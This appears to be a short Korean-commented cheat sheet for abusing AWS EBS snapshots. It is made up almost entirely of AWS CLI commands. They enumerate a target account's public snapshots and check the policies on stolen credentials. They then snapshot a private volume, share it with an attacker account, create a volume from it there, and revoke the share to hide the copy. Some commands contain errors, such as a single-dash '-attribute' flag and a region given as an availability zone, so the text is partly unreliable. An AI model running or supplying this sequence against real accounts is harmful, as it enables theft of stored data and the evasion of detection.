EBS Snapshot
Abuse
# Account ID를 기반으로 퍼블릭 EBS 목록 열거
aws ec2 describe-snapshots --owner-ids '<target-account-id>' --region 'ap-northeast-2' --query "Snapshots[*].[SnapshotId,VolumeSize,Description]" --output table
# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone 'ap-northeast-2' --snapshot-id '<snap-id>'# 획득한 크리덴셜을 이용하여 관리형 정책 확인
aws iam list-attached-user-policies --user-name '<user-id>' --query "AttachedPolicies[*].PolicyName" --output table
# 인라인 정책 확인
aws iam list-user-policies --user-name '<user-id>'
aws iam get-user-policy --user-name '<user-id>' --policy-name '<policy-name>'
# Private EBS의 스냅샷 생성
aws ec2 create-snapshot --volume-id '<volume-id>' --description '<snap-id>'
# 공격자 계정이 EBS 스냅샷에 접근할 수 있도록 권한 부여
aws ec2 modify-snapshot-attribute --snapshot-id '<snap-id>' -attribute createVolumePermission --operation-type add --user-ids '<account-id>'
# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone 'ap-northeast-2' --snapshot-id '<snap-id>'
# 할당한 공격자 계정의 권한을 삭제
aws ec2 modify-snapshot-attribute --snapshot-id '<snap-id>' -attribute createVolumePermission --operation-type remove --user-ids '<account-id>'

Last updated